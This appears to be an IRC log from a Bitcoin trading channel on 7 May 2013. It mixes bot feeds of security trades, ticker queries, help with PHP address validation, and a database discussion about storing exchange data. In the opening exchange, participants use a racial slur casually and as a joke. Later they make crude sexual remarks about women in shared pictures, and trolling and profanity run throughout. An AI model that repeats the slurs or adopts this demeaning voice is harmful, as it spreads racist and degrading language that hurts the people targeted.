asset tag on your asset tag thats on your tagged asset May 07 01:24:36 (re: stickers with two barcodes on them) May 07 01:24:58 man May 07 01:25:01 all this herp May 07 01:25:25 here's the problem with colocation facility techs May 07 01:25:45 as soon as they reach some marginal level of competence, amazon swoops in and is all "WE R MAKE U NGNR" May 07 01:26:06 niggagrnr? May 07 01:26:35 dat the guy who manages the naggers? May 07 01:26:52 it's a bastardization of engineer May 07 01:26:59 arr May 07 01:27:12 it's supposed to be grunted as though by a recruiter who doesn't understand the words they use May 07 01:27:15 engineer, nigger, same deal May 07 01:27:27 URH-JUR-NUR May 07 01:27:41 do elaborate, dub May 07 01:28:30 [BTCTC] [TAT.ASICMINER] 10 @ 0.0126 = 0.126 BTC [+] May 07 01:28:30 nothing to elabo-rate May 07 01:28:51 I'm a black man that happens to be an engineer May 07 01:29:43 v61 May 07 01:30:58 gtfo with your negative nancying cnut May 07 01:31:35 i thought someone would get the reference May 07 01:32:05 gtfo with your negative cunting, nancy. May 07 01:32:40 there will be no negative cunting May 07 01:32:47 does negative cunt mean dick? May 07 01:32:54 i think that's an inversion May 07 01:32:56 or an eversion May 07 01:33:00 i thin it may in a literal sense May 07 01:33:21 no no the dick is the *complement* to the vagina May 07 01:33:23 not the opposite May 07 01:33:30 urite May 07 01:33:43 the vsagine will just be weird colors then May 07 01:34:35 oh no! May 07 01:34:42 not tiberiusiv May 07 01:34:53 mother of all fucks what cnow!>!?!?! May 07 01:35:03 mother of all cnuts May 07 01:35:37 lol May 07 01:37:40 [MPEX] [S.MPOE] 7800 @ 0.00071551 = 5.581 BTC [+] May 07 01:37:42 [MPEX] [S.MPOE] 9250 @ 0.00071561 = 6.6194 BTC [+] May 07 01:38:19 vag is the penis missing the penis, like coffee no coffee May 07 01:38:43 wtf... May 07 01:39:00 more like, a clit is a small penis May 07 01:39:18 so you might be a penis licker May 07 01:39:46 guys take it to #bitcoin-trollbox May 07 01:39:54 says dub May 07 01:40:03 well its his channel May 07 01:40:06 so he would May 07 01:40:14 hehe May 07 01:40:33 i heard its some cunts May 07 01:40:36 so makes sense May 07 01:40:59 trun 360 deg first May 07 01:41:03 turn it too May 07 01:41:06 don't forget to drop the mic May 07 01:42:21 hm i missed this one May 07 01:42:26 https://crypto.pm/ May 07 01:42:34 see pizzaman1337 told you there was 25 of them May 07 01:42:53 also related, pm stands for picku mater here which means mothers cunt May 07 01:44:36 hmmm May 07 01:45:11 [BTCTC] [ASICMINER-PT] 1 @ 1.211111 BTC [-] May 07 01:45:16 o hi pgp May 07 01:47:00 ;;ticker May 07 01:47:07 ;;goxlag May 07 01:47:15 ;;goxlaglag May 07 01:47:28 ;;down mtgox.com May 07 01:47:30 hehe May 07 01:47:35 or whatever the command is May 07 01:47:42 isup? May 07 01:47:46 isdown? May 07 01:51:29 >At 8500/BTC, 100 billion XRP is valued at 11.8 million BTC = $1.3 billion USD May 07 01:52:31 is that really the value? May 07 01:52:36 apparently May 07 01:52:36 i have like 30000 i think May 07 01:53:06 you are almost rich or something May 07 01:53:16 almost, just gotta wait anothe year May 07 01:55:05 it almost counts May 07 01:57:39 it almost cnuts May 07 02:03:43 [BTCTC] [ASICMINER-PT] 5 @ 1.211111 = 6.0556 BTC [-] May 07 02:09:10 [HAVELOCK] [HIM] 10 @ 1.9399 = 19.399 BTC [+] May 07 02:12:24 [MPEX] [S.MPOE] 1604 @ 0.00071561 = 1.1478 BTC [+] May 07 02:12:26 [MPEX] [S.MPOE] 6350 @ 0.00071819 = 4.5605 BTC [+] May 07 02:12:32 [MPEX] [S.MPOE] 5100 @ 0.00072115 = 3.6779 BTC [+] May 07 02:12:34 [MPEX] [S.MPOE] 661 @ 0.0007221 = 0.4773 BTC [+] May 07 02:13:28 [MPEX] [S.MPOE] 38 @ 0.00072998 = 0.0277 BTC [+] May 07 02:13:30 [MPEX] [S.MPOE] 15198 @ 0.00072999 = 11.0944 BTC [+] May 07 02:16:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.0126 = 0.0252 BTC [+] May 07 02:16:14 i need a way to validate bitcoin addresses via php or some web api May 07 02:16:38 any help would be great May 07 02:17:47 http://pastebin.com/raw.php?i=W42CabYE May 07 02:18:08 some of the stuff needs minor adjustment to work May 07 02:18:19 BitTools::checkAddress should work ok May 07 02:18:33 wtf is that May 07 02:18:46 wtf is what May 07 02:18:54 you said php and addy validation? May 07 02:18:56 BitTools::checkAddress May 07 02:19:03 link to me to what you are talking about May 07 02:19:06 did you open the fuckin link? May 07 02:19:08 i said i dont know anything about it May 07 02:19:21 o May 07 02:19:29 do i have to use all those functions May 07 02:19:39 do you know php? May 07 02:19:43 YES May 07 02:19:49 well then you will figure it out May 07 02:20:11 bro do you even php? May 07 02:20:12 can you give a little explanation, im not able to read 200 lines of code and understand exactly what i need to do May 07 02:20:18 well mabey you can help me out May 07 02:20:23 it's a static class May 07 02:20:24 teach a man that fishing catches fish May 07 02:20:30 herp::derp() can be used just like that May 07 02:20:42 There are currently 142319.06 bitcoins demanded at or over 50.0 USD, worth 10974333.1551 USD in total. | Data vintage: 0.0061 seconds May 07 02:20:47 There are currently 128519.64 bitcoins offered at or under 200.0 USD, worth 19452137.4741 USD in total. | Data vintage: 5.0105 seconds May 07 02:20:55 There are currently 48500196 bitcoins demanded at or over 0.0 USD, worth 16841322.5941 USD in total. | Data vintage: 12.4175 seconds May 07 02:20:57 lol May 07 02:21:14 ok so what varaible do i put the address into May 07 02:21:21 so, what he said, BitTools::checkAddress($address) May 07 02:21:25 what is so hard about it May 07 02:21:30 herp::derp() May 07 02:21:37 that isnt even in that script May 07 02:21:53 weird, what triggered gribble? May 07 02:22:12 lol May 07 02:22:26 ThickAsThieves: do you have tiberiusiv on ignore or something? May 07 02:22:30 oh May 07 02:22:32 :) May 07 02:22:33 lol May 07 02:22:44 ghost of tibby May 07 02:24:23 haters gonna hate May 07 02:24:54 this channel should be moved to #bitcoin-trolling May 07 02:25:11 but then we'd all be the same with a different name May 07 02:25:24 the code has an error that you gave me May 07 02:26:24 joecool: its #bitcoin-trollbox May 07 02:26:52 cause i mean, i'm lookin around in here May 07 02:27:04 we got the best of the best for trolling in here May 07 02:27:27 -trollbox is for next level trolling May 07 02:28:37 Tiberius is def a black belt troll May 07 02:28:56 wat May 07 02:28:58 he's reached zen troll nirvana May 07 02:29:12 ThickAsThieves: Luke-Jr's the troll pope May 07 02:29:20 lol May 07 02:29:34 i'm a hipster troll May 07 02:29:38 St. Eligius, patron saint of trolls too May 07 02:29:40 i only troll ironically May 07 02:30:47 man May 07 02:31:07 [BTCTC] [ASICMINER-PT] 1 @ 1.211111 BTC [-] May 07 02:31:08 that dude is missing from all my chans nao May 07 02:31:51 [BTCTC] [B.YABMC] 50 @ 0.019 = 0.95 BTC [-] May 07 02:32:36 (16:20) < dub> bro do you even php? << haha May 07 02:49:13 [MPEX] [S.MPOE] 5735 @ 0.00072334 = 4.1484 BTC [-] May 07 02:49:14 [MPEX] [S.MPOE] 3465 @ 0.00070663 = 2.4485 BTC [-] May 07 02:49:15 [MPEX] [S.MPOE] 5700 @ 0.00070617 = 4.0252 BTC [-] May 07 02:51:25 [BTCTC] [BITVPS] 1 @ 0.00168 BTC [+] May 07 02:54:55 [BTCTC] [ASICMINER-PT] 1 @ 1.211111 BTC [-] May 07 02:56:00 [BTCTC] [ASICMINER-PT] 1 @ 1.19 BTC [-] May 07 03:38:10 [MPEX] [S.MPOE] 4300 @ 0.00071172 = 3.0604 BTC [+] May 07 03:40:01 dude May 07 03:40:08 tiberiusiv - banned? May 07 03:40:20 he's like inoculations for your brain May 07 03:48:57 [MPEX] [S.MPOE] 1200 @ 0.00072734 = 0.8728 BTC [+] May 07 03:58:10 [HAVELOCK] [HIM] 2 @ 1.9399 = 3.8798 BTC [+] May 07 03:58:12 [HAVELOCK] [HIM] 2 @ 1.94 = 3.88 BTC [+] May 07 04:14:41 [MPEX] [S.MPOE] 1800 @ 0.00072734 = 1.3092 BTC [+] May 07 04:20:23 [MPEX] [S.MPOE] 1600 @ 0.00072118 = 1.1539 BTC [-] May 07 04:31:43 [BTCTC] [B.YABMC] 25 @ 0.018 = 0.45 BTC [-] May 07 04:31:53 [BTCTC] [B.YABMC] 25 @ 0.017 = 0.425 BTC [-] May 07 04:39:51 [BTCTC] [TAT.ASICMINER] 80 @ 0.0126 = 1.008 BTC [+] May 07 04:48:07 [MPEX] [S.MPOE] 5900 @ 0.00071843 = 4.2387 BTC [-] May 07 05:20:49 mircea_popescu: What's your take on Transnistria? May 07 05:20:56 my take ?! May 07 05:21:27 my take on transnistria is bed. catch you later :) May 07 05:21:40 Python interface unloaded May 07 05:21:41 Tcl interface unloaded **** ENDING LOGGING AT Tue May 7 05:21:42 2013 **** BEGIN LOGGING AT Tue May 7 13:45:00 2013 May 07 13:45:17 ;;ticker May 07 13:45:28 BTCUSD ticker | Best bid: 110.92000, Best ask: 110.92899, Bid-ask spread: 0.00899, Last trade: 110.92000, 24 hour volume: 157268.23980772, 24 hour low: 102.00000, 24 hour high: 124.90000, 24 hour vwap: 113.68335 May 07 13:45:41 lol. look at all the stuff that's not happening! May 07 13:50:18 Indeed May 07 13:51:28 [MPEX] [S.MPOE] 6833 @ 0.00071447 = 4.882 BTC [+] May 07 13:51:30 [MPEX] [S.MPOE] 2767 @ 0.0007197 = 1.9914 BTC [+] May 07 14:03:27 seems mpex withdrawals are not happening either :D May 07 14:03:59 ;;seens smickles May 07 14:04:00 Error: "seens" is not a valid command. May 07 14:04:03 ;;seen smickles May 07 14:04:06 smickles was last seen in #bitcoin-assets 4 weeks, 4 days, 19 hours, 21 minutes, and 29 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm May 07 14:04:28 lol a month passed already May 07 14:06:39 jurov in about an hour i'd say. May 07 14:16:21 twitter is too much fun. May 07 14:16:27 @mircea_popescu I wanna screw your girlfriend. Deal ? @jdrive I want a dune buggy. There, I said it. May 07 14:18:28 [BTCTC] [ASICMINER-PT] 4 @ 1.255 = 5.02 BTC [+] May 07 14:18:39 https://bitcointalk.org/index.php?topic=197842.0;topicseen :D May 07 14:19:51 ahgagag. May 07 14:20:11 jurov: wtf May 07 14:20:32 seems just a joke May 07 14:20:40 but this looks serious: https://bitcointalk.org/index.php?topic=192008.msg2051199 May 07 14:20:54 notice the sauna in program May 07 14:22:06 sauna 50 hours nonstop May 07 14:28:00 [BTCTC] [TAT.ASICMINER] 15 @ 0.012625 = 0.1894 BTC [+] May 07 14:30:24 maybe they're making a new alt chain May 07 14:30:28 proof of perspiration. May 07 14:31:16 mircea_popescu: in a proof of wit chain, your blocks would be rejected May 07 14:32:01 why? they would cause permanent fork due to bug in code, if anything May 07 14:32:28 o yeah ?! well screw you guys May 07 14:32:30 im going home. May 07 14:33:46 hi May 07 14:34:18 hi kakocnut May 07 14:34:32 sup May 07 14:35:21 apparently nothing... just some sauna supernode May 07 14:35:22 im a jerk now May 07 14:35:26 i just read. May 07 14:35:59 kakojerk? May 07 14:36:05 jerkako May 07 14:37:14 >You are a very negative person - and full of assumptions. May 07 14:37:17 i hear that a lot May 07 14:37:25 and a after a while they normally apologize May 07 14:38:49 lol May 07 14:38:59 kakojerkla May 07 14:39:19 Fontas is involved with it somehow May 07 14:39:33 so that mem guy is going all ballistic over "racism11!!" May 07 14:39:41 foooooontas May 07 14:39:48 where? May 07 14:39:48 I heard Fontas made this one dude's children orphans by running off with this guy's wife. May 07 14:40:49 [BTCTC] [B.YABMC] 21 @ 0.01889 = 0.3967 BTC [+] May 07 14:41:20 [BTCTC] [B.YABMC] 50 @ 0.0189 = 0.945 BTC [+] May 07 14:41:42 who's fantomas ? May 07 14:42:12 [BTCTC] [B.YABMC] 50 @ 0.01899 = 0.9495 BTC [+] May 07 14:42:26 the famous altcoin pumper chickun May 07 14:42:36 [BTCTC] [B.YABMC] 50 @ 0.018999 = 0.95 BTC [+] May 07 14:42:57 oh ? May 07 14:43:06 dude fame happens to fast, was he here even three months ago ? May 07 14:44:00 fly chickun May 07 14:44:01 [BTCTC] [ASICMINER-PT] 1 @ 1.231 BTC [-] May 07 14:44:13 he was working in a convenience store selling cigarettes and beer until he found this USB drive labeled "btc wallet" a customer left behind May 07 14:44:25 dis a joke? May 07 14:44:28 As it turns out, the customer didnt passwd protect his digital wallet May 07 14:44:46 so the legend goes..now he dresses in Armani suits and pumps alt coins for profit May 07 14:44:55 fontase is a satoshi prodigy genius, unchained May 07 14:45:06 huh May 07 14:45:12 https://twitter.com/fontase/ May 07 14:45:24 KRS1 right-o. May 07 14:45:35 because every scammer knows the secret to survival is making up good stories. May 07 14:45:54 but i am very happy to notice the new trends, specifically : May 07 14:45:56 ;) May 07 14:46:01 A. scammers are now affraid of BTC pretty much May 07 14:46:13 B. scammers are more interested in softscamming than actual coins. May 07 14:46:19 ie, they'll try to scam "face" rather than money. May 07 14:46:27 this is nicely maturing along after all. May 07 14:46:56 hmm? May 07 14:47:07 scam face? May 07 14:47:49 [BTCTC] [B.YABMC] 6 @ 0.01888 = 0.1133 BTC [-] May 07 14:48:07 "face", it's this chinese concept May 07 14:48:18 like... fame, say. May 07 14:48:42 basically the goal of the scammers is more being as known as justin bieber than as rich as warrenn buffett these days. May 07 14:49:11 dunno May 07 14:49:28 one could hardly be rich with btc until recenetly May 07 14:50:14 well btc-rich obviously. May 07 14:50:18 Armani suites dude.. May 07 14:50:50 real class doesn't need an armani suit May 07 14:51:03 (a hugo boss one is largely sufficient :-) ) May 07 14:51:05 lol May 07 14:51:11 it does if he came from a clerk in a convenience store May 07 14:51:16 am i strictly the only guy in btc whio actually wears suits ? May 07 14:51:37 I think yours is called a "Leisure Suit" May 07 14:51:44 KRS1: lol May 07 14:51:52 which is also very cool dont get me wrong May 07 14:52:17 mjr wears a suite May 07 14:52:23 doesnt it May 07 14:52:25 he May 07 14:52:32 no May 07 14:52:41 kakobrekla jeans don't count. also need vest. May 07 14:52:55 he didnt have jeans May 07 14:53:02 but he didn't have a suit May 07 14:53:02 [BTCTC] [B.YABMC] 19 @ 0.01888 = 0.3587 BTC [-] May 07 14:53:05 im saying generally! May 07 14:53:10 See, travolta made the leisure suit cool: http://onehonestman.files.wordpress.com/2010/10/leisure-suit1.jpg May 07 14:53:12 [BTCTC] [B.YABMC] 25 @ 0.01875 = 0.4688 BTC [-] May 07 14:53:19 what did he have then May 07 14:53:20 KRS1 you are proceeding on very partial information. May 07 14:53:22 [BTCTC] [B.YABMC] 24 @ 0.0185 = 0.444 BTC [-] May 07 14:53:23 if not a suit May 07 14:53:30 the current blog header rotates, out of about a dozen or so picks May 07 14:53:32 pix* May 07 14:53:34 dunno, like non-jean pants + shirt May 07 14:53:51 IT DOES NOT QUALIFY AS A SUIT GODDAMMIT May 07 14:53:58 shuddup frenchie :D May 07 14:53:58 lets see May 07 14:54:17 http://i.imgur.com/OC7TsEzh.jpg May 07 14:54:23 ok thats not him but suits? May 07 14:54:34 LOL May 07 14:54:36 http://i.imgur.com/99vxqXQh.jpg May 07 14:54:37 aha May 07 14:54:40 tie is missing May 07 14:54:46 look mircea, no suite for you May 07 14:55:02 did the pants match the vest ? May 07 14:55:06 yes May 07 14:55:08 black May 07 14:55:17 kakobrekla you know that's just some random waiter right ? May 07 14:55:19 well, i guess that, it is suit May 07 14:56:16 mircea_popescu :) May 07 14:56:27 heres the full set http://imgur.com/a/wEW8Q May 07 14:56:32 isnt mine May 07 14:56:40 i think it's mjr's May 07 14:56:51 the suites guy. May 07 14:57:31 no, the clubbin failpix guy :D May 07 14:57:48 lol May 07 14:57:55 http://i.imgur.com/mvMBpdih.jpg May 07 14:57:58 i cant fap to this May 07 14:59:36 http://trilema.com/2011/nsfw-gradina-edenului/ May 07 14:59:38 fap to that then May 07 14:59:52 [MPEX] [S.DICE] 2850 @ 0.00317509 = 9.049 BTC [+] May 07 15:01:01 later bbl May 07 15:01:18 1) paywall. check 2) everything in romanian. check May 07 15:01:43 Scrat: lol May 07 15:02:22 poor people fap to small pix. May 07 15:02:28 gigavps was last seen in #bitcoin-assets 9 weeks, 4 days, 14 hours, 49 minutes, and 24 seconds ago: well, we can rule out c, i have block chain transaction to prove what i have paid May 07 15:02:32 mircea_popescu: you should add a BUYCREDITS command to mpex May 07 15:02:42 lol May 07 15:02:54 seriously May 07 15:03:02 no, i should add 0.1% of all deposits > trilema credits May 07 15:03:02 your payment gateway sucks May 07 15:03:24 getting credits for depositing? May 07 15:03:43 getting part of your deposit as credits. like in socialism! May 07 15:03:50 oh May 07 15:14:02 [HAVELOCK] [HIM] 6 @ 2 = 12 BTC [+] May 07 15:15:02 [HAVELOCK] [SDICE] 2 @ 0.30999999 = 0.62 BTC [+] May 07 15:21:23 [BTCTC] [BTC-BOND] 169 @ 0.01001 = 1.6917 BTC [-] May 07 15:26:16 I probably shouldn't have used sqlite to store all of gox's historical trade data.. May 07 15:26:18 [MPEX] [S.MPOE] 1333 @ 0.0007197 = 0.9594 BTC [+] May 07 15:26:49 I want to graph the USD value for various securities over time May 07 15:27:51 why not? sqlite isn't that bad for time series May 07 15:29:20 Why do these naked pool parties always happen in some far off country in Europe or something. May 07 15:29:27 parseval actually this sounds interesting. ding me when you have the graphs ? May 07 15:29:59 And goddamnit every picture I click on takes me to an article with no picture..how am I supposed to fap to thi May 07 15:30:00 this May 07 15:30:13 Sure May 07 15:30:25 lol wut May 07 15:30:56 btw, anyone here try planeshift recently ? May 07 15:31:05 it's pretty good by now. May 07 15:31:07 [BTCTC] [B.YABMC] 25 @ 0.0185 = 0.4625 BTC [-] May 07 15:31:14 I have needs too..I want to see pic 42 at least fullscreen May 07 15:31:41 sqlite seems a bit slow.. I'm going to reprocess the data into 5 minute intervals with the average price and volume for that interval May 07 15:31:55 Are these girls your friends? May 07 15:31:56 parseval honestly 1 day intervals would be a great thing to have. May 07 15:32:09 http://i.imgur.com/VtRqw1T.gif May 07 15:32:10 haha May 07 15:32:12 KRS1 jealous ? :D May 07 15:33:04 yeah that one girl with the small boobies is a must have May 07 15:33:13 [BTCTC] [TAT.ASICMINER] 38 @ 0.0126 = 0.4788 BTC [-] May 07 15:33:19 parseval: how big is the data? I've found sqlite to be very fast for running queries on time series May 07 15:33:32 I have a pool the best I ever did was have one stripper naked in it, nothing like this. May 07 15:33:44 I think coke was involved somehow May 07 15:34:14 nope, not at all. May 07 15:34:21 I'm doing the initial imports, it's about 1gb of json data up through the end of april May 07 15:34:26 they're nice girls, too. in school and everything May 07 15:35:08 for that matter, the boat cost more than they did. May 07 15:35:41 parseval: you have to group chunks of 10k inserts into transactions May 07 15:36:02 Well, I'm throwing it all into Django ORM, so that probably adds a bit of overhead May 07 15:36:17 yeah, like 100000% overhead May 07 15:36:20 (Seriously) May 07 15:36:42 It'll make querying the data a lot easier in the end though May 07 15:37:00 parseval: s/Django/Rails/ May 07 15:37:21 (let's get this started xD) May 07 15:38:24 lol rails May 07 15:38:46 I guess it's ok if you want to get railed in the ass May 07 15:40:20 lol May 07 15:41:33 meh May 07 15:41:59 [MPEX] [S.MPOE] 13450 @ 0.00072524 = 9.7545 BTC [+] May 07 15:50:43 eh, i've to import ~400gb of data into postgres, i do ORM commit every 100k inserts, it's actually quite fast :) (sqlalchemy orm abstraction). not really a problem May 07 15:52:19 parseval: yeah i don't think sqlite is a good solution in terms of scaling. if you're using ORM abstraction, changing the underlying DB shouldn't be a prob, unless you're using some DB-specific functions. postgres is really nice for Shitloads of Data type of situations May 07 15:52:50 [BTCTC] [GSDPT] 50 @ 0.00295 = 0.1475 BTC [-] May 07 15:53:00 [BTCTC] [GSDPT] 238 @ 0.00294 = 0.6997 BTC [-] May 07 15:54:45 it's fine May 07 15:55:00 sqlite will do 100k inserts per second on crapy hardware if you group them May 07 15:55:19 and build indices afterwards May 07 15:56:05 but you wouldn't use SQL for storing BIG time series May 07 15:56:53 there are DBs made specifically for that. there are also generics like Cassandra or mongo that excel at it May 07 15:57:51 Scrat: depends about what you call "big" May 07 15:59:22 davout: well, 100+ gigs of randomly accessible time series May 07 16:00:09 if you have the disk space i don't see how a well indexed sql storage wouldn't be adapted May 07 16:00:53 not saying that it doesn't work. it's just not optimal May 07 16:03:12 can't go wrong with postgres though May 07 16:03:24 unless you want to do multimaster. heh May 07 16:03:51 db design might be the most "overengineered as a hobby" thing in it. May 07 16:04:19 premature optimization to the point of insanity May 07 16:04:30 please disregard everything i've just said May 07 16:04:31 ^ May 07 16:06:53 yeah, db design can turn into a fetish, unless it turns out significant optimizations are relevant to business strategy and whatnot May 07 16:07:40 heh, postgres + multimaster.. yeah :) May 07 16:07:44 Framedragger i think the cause is this : db ops may take > 1 minute. May 07 16:07:51 that's one minute or more left for the author to fret May 07 16:08:13 heheh, well if we are also worried about DB _querying_ though.. May 07 16:08:18 nobody just goes "fuck it, saving 4 hours out of 7 is not worth spending 2 days coding" May 07 16:08:26 where responsive near-realtime APIs are built, etc May 07 16:08:40 yeah May 07 16:08:53 [MPEX] [S.MPOE] 4350 @ 0.00072524 = 3.1548 BTC [+] May 07 16:14:17 ;;tslb May 07 16:14:21 Time since last block: 44 minutes and 11 seconds May 07 16:14:44 ;;estimate May 07 16:14:47 Next difficulty estimate | 10666629.6451 based on data since last change | 11536948.7666 based on data for last three days May 07 16:17:37 ;;ticker May 07 16:17:37 BTCUSD ticker | Best bid: 104.30002, Best ask: 104.90479, Bid-ask spread: 0.60477, Last trade: 104.90479, 24 hour volume: 152353.43826341, 24 hour low: 102.00000, 24 hour high: 124.66300, 24 hour vwap: 112.03069 May 07 16:17:39 [MPEX] [S.MPOE] 5909 @ 0.0007281 = 4.3023 BTC [+] May 07 16:19:43 [BTCTC] [BITVPS] 15 @ 0.00169 = 0.0254 BTC [+] May 07 16:20:54 [BTCTC] [B.YABMC] 20 @ 0.0188 = 0.376 BTC [+] May 07 16:27:05 Framedragger: I'm just using this as an intermediary store on my local box for some testing so I don't have to throw in a full fledged database.. It's a simple delete and rerun until everything is nailed down with the import. Eventually I'll move out to mysql or postgres for the actual application May 07 16:27:30 [BTCTC] [B.YABMC] 25 @ 0.0188 = 0.47 BTC [+] May 07 16:29:08 parseval: sure, just note that it's usually trivial (as in, perhaps only change the db configuration string in your app's config) to change the underlying DB (installing and starting a DB server with default config is also usually really simple) - but yeah, would be interesting to see your results eventually, good luck! May 07 16:29:26 Thanks :) May 07 16:31:37 [MPEX] [S.MPOE] 7091 @ 0.0007281 = 5.163 BTC [+] May 07 16:31:39 [MPEX] [S.MPOE] 4909 @ 0.0007295 = 3.5811 BTC [+] May 07 16:42:13 [BTCTC] [GSDPT] 15 @ 0.00315 = 0.0473 BTC [+] May 07 16:42:29 http://dealbook.nytimes.com/2013/05/06/a-push-for-a-bitcoin-buttonwood/ May 07 16:42:35 LOLZ May 07 16:43:23 [BTCTC] [B.YABMC] 25 @ 0.018 = 0.45 BTC [-] May 07 16:43:32 [BTCTC] [B.YABMC] 25 @ 0.017 = 0.425 BTC [-] May 07 16:44:01 nice May 07 16:44:03 gj May 07 16:44:29 important they mentioned your loafers May 07 16:45:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.0125 = 0.025 BTC [-] May 07 16:45:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.0125 BTC [-] May 07 16:45:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.0125 BTC [-] May 07 16:45:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.0125 = 0.05 BTC [-] May 07 16:45:29 TAT.ASICMINER tanking May 07 16:45:37 [BTCTC] [TAT.ASICMINER] 22 @ 0.0125 = 0.275 BTC [-] May 07 16:45:47 oh wait its not May 07 16:47:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.0125 BTC [-] May 07 16:47:37 hehe May 07 16:47:38 [BTCTC] [ASICMINER-PT] 1 @ 1.2549 BTC [+] May 07 16:47:49 never sold below .0125 yet May 07 16:47:53 afaik May 07 16:48:33 [BTCTC] [TAT.ASICMINER] 57 @ 0.0125 = 0.7125 BTC [-] May 07 16:50:56 makomk malaimo maximian metabyte midnightmagic MiningBuddy mircea_popescu MJR_ mjr_1 mjr___ mod6 mpexbot May 07 16:50:57 makomk malaimo maximian metabyte midnightmagic MiningBuddy mircea_popescu MJR_ mjr_1 mjr___ mod6 mpexbot May 07 16:50:58 nice MJR_ May 07 16:59:10 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] May 07 17:06:06 [MPEX] [S.MPOE] 3165 @ 0.0007295 = 2.3089 BTC [+] May 07 17:06:07 [MPEX] [S.MPOE] 10919 @ 0.00072962 = 7.9667 BTC [+] May 07 17:15:41 ;;bids 0 May 07 17:15:45 There are currently 5.0476089e+09 bitcoins demanded at or over 0.0 USD, worth 17084843.7602 USD in total. | Data vintage: 0.0289 seconds May 07 17:17:13 nicely done MJR_ May 07 17:27:20 thanks guys May 07 17:28:44 [BTCTC] [ASICMINER-PT] 2 @ 1.24 = 2.48 BTC [-] May 07 17:28:48 [BTCTC] [ASICMINER-PT] 1 @ 1.231 BTC [-] May 07 17:28:58 [BTCTC] [ASICMINER-PT] 1 @ 1.23 BTC [-] May 07 17:36:55 ;;bc,stats May 07 17:36:57 Current Blocks: 234989 | Current Difficulty: 1.0076292883418716E7 | Next Difficulty At Block: 235871 | Next Difficulty In: 882 blocks | Next Difficulty In About: 5 days, 6 hours, 45 minutes, and 16 seconds | Next Difficulty Estimate: 10699222.0093 | Estimated Percent Change: 6.18213 May 07 17:46:41 [BTCTC] [PAJKA.BOND] 3 @ 0.107 = 0.321 BTC [-] May 07 17:47:35 [MPEX] [S.MPOE] 5600 @ 0.00073042 = 4.0904 BTC [+] May 07 17:47:36 [MPEX] [S.MPOE] 5102 @ 0.00073382 = 3.7439 BTC [+] May 07 17:47:37 [MPEX] [S.MPOE] 616 @ 0.000735 = 0.4528 BTC [+] May 07 17:52:09 [BTCTC] [B.YABMC] 5 @ 0.0188 = 0.094 BTC [+] May 07 18:02:46 [BTCTC] [ASICMINER-PT] 1 @ 1.22003 BTC [-] May 07 18:03:02 [BTCTC] [ASICMINER-PT] 1 @ 1.22002 BTC [-] May 07 18:03:12 [BTCTC] [ASICMINER-PT] 3 @ 1.212 = 3.636 BTC [-] May 07 18:03:15 [MPEX] [S.MPOE] 9150 @ 0.00072985 = 6.6781 BTC [-] May 07 18:03:17 [BTCTC] [ASICMINER-PT] 1 @ 1.211021 BTC [-] May 07 18:03:25 [BTCTC] [ASICMINER-PT] 2 @ 1.21102 = 2.422 BTC [-] May 07 18:03:29 [BTCTC] [ASICMINER-PT] 3 @ 1.21101 = 3.633 BTC [-] May 07 18:03:33 [BTCTC] [ASICMINER-PT] 2 @ 1.211 = 2.422 BTC [-] May 07 18:04:58 [BTCTC] [TAT.ASICMINER] 4 @ 0.012613 = 0.0505 BTC [+] May 07 18:08:04 ;;bids 0 May 07 18:08:05 There are currently 5.0475987e+09 bitcoins demanded at or over 0.0 USD, worth 16649216.8979 USD in total. | Data vintage: 117.2777 seconds May 07 18:11:37 [MPEX] [S.MPOE] 4345 @ 0.00072985 = 3.1712 BTC [-] May 07 18:11:39 [MPEX] [S.MPOE] 7814 @ 0.00072524 = 5.667 BTC [-] May 07 18:22:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.012613 BTC [+] May 07 18:31:20 $avg May 07 18:31:21 jurov: 108.61 May 07 18:34:42 [BTCTC] [TAT.ASICMINER] 4 @ 0.012613 = 0.0505 BTC [+] May 07 18:50:41 [BTCTC] [PAJKA.BOND] 9 @ 0.107 = 0.963 BTC [-] May 07 19:11:30 [BTCTC] [ASICMINER-PT] 1 @ 1.25377 BTC [+] May 07 19:11:41 [BTCTC] [ASICMINER-PT] 1 @ 1.25377 BTC [+] May 07 19:17:15 $vwap ^OIX May 07 19:17:16 mod6: ^OIX 1 day: no data 7 day: average: 90.02793313 high: 160.83836109 low: 72.33603038 volume: 3473 btc: 1336.92580709 30 day: no data May 07 19:23:04 [BTCTC] [ASICMINER-PT] 1 @ 1.25378 BTC [+] May 07 19:23:15 [BTCTC] [ASICMINER-PT] 1 @ 1.2538 BTC [+] May 07 19:23:38 [BTCTC] [ASICMINER-PT] 1 @ 1.254 BTC [+] May 07 19:24:17 ;;next May 07 19:24:17 expecting to test 110 | support 102, 100, 97, 94 | resistance: 108 | #bitcoin [Tue, 07 May 2013 15:59:50 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | 24 minutes and 26 seconds ago May 07 19:30:06 take that next crap back to analysis, tomservo May 07 19:30:13 ;) May 07 19:30:19 easy killer May 07 19:33:50 [BTCTC] [ASICMINER-PT] 1 @ 1.254999 BTC [+] May 07 19:36:30 [BTCTC] [B.YABMC] 10 @ 0.018 = 0.18 BTC [-] May 07 19:45:21 https://encyclopediadramatica.se/Bitcoin ... rather underwhelming May 07 19:45:49 but dunno where this came from: "The value of the bitcoin is pegged to AZNs" May 07 19:48:57 [MPEX] [S.MPOE] 4384 @ 0.000735 = 3.2222 BTC [+] May 07 19:49:00 [MPEX] [S.MPOE] 466 @ 0.00073581 = 0.3429 BTC [+] May 07 19:56:24 azns = math May 07 20:01:35 [MPEX] [S.MPOE] 2196 @ 0.00073581 = 1.6158 BTC [+] May 07 20:02:39 jurov ed dioed about a decade ago May 07 20:03:43 heh okay May 07 20:05:13 That, coupled with the fact that I am young and willing to take my life in a new direction, have pushed towards my presence at the Summit. May 07 20:05:33 oh, sweet innocence.... May 07 20:05:50 (from sauna supernode summit thread) May 07 20:10:11 omg May 07 20:10:19 bitstamp is way more lame than i thought it was May 07 20:10:26 this is fuckin shame May 07 20:10:36 [BTCTC] [ASICMINER-PT] 5 @ 1.25377 = 6.2689 